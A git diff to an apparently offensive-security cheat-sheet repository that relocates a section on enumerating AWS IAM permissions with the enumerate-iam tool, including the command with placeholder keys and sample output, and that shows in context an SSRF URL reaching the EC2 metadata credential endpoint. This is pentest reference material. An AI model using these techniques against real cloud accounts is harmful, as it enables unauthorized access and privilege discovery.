diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index bb8ad5b8..221eefdf 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md @@ -48,14 +48,6 @@ curl --request PUT \ --data '{"highlightPreTag": ""}' ``` -### AWS Access Key ID & Secret - -```powershell -git clone https://github.com/andresriancho/enumerate-iam -cd enumerate-iam -./enumerate-iam.py --access-key AKIA... --secret-key XXX.. -``` - ### Slack API Token ```powershell diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 1a73cf76..97b1fd62 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -155,34 +155,6 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/ - -## Enumerate IAM permissions - -Enumerate the permissions associated with AWS credential set with [enumerate-iam](https://github.com/andresriancho/enumerate-iam) - -```powershell -git clone git@github.com:andresriancho/enumerate-iam.git -cd enumerate-iam/ -pip install -r requirements.txt -./enumerate-iam.py --access-key AKIA... --secret-key StF0q... -2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..." -2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked! -2019-05-10 15:58:01,537 - 21345 - [INFO] -- { - "RoleDetailList": [ - { - "Tags": [], - "AssumeRolePolicyDocument": { - "Version": "2008-10-17", - "Statement": [ - { -... -2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked! -2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked! -2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked! -2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked! -2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked! -``` - ## References * [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets) diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index 0275e716..e795052a 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md @@ -417,6 +417,32 @@ $> aws_consoler -v -a AKIA[REDACTED] -s [REDACTED] https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Fregion%3Dus-east-1&SigninToken=[REDACTED ``` +## AWS - Enumerate IAM permissions + +Enumerate the permissions associated with AWS credential set with [enumerate-iam](https://github.com/andresriancho/enumerate-iam) + +```powershell +git clone git@github.com:andresriancho/enumerate-iam.git +pip install -r requirements.txt +./enumerate-iam.py --access-key AKIA... --secret-key StF0q... +2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..." +2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked! +2019-05-10 15:58:01,537 - 21345 - [INFO] -- { + "RoleDetailList": [ + { + "Tags": [], + "AssumeRolePolicyDocument": { + "Version": "2008-10-17", + "Statement": [ + { +... +2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked! +2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked! +2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked! +2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked! +2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked! +``` + ## AWS - Mount EBS volume to EC2 Linux :warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken.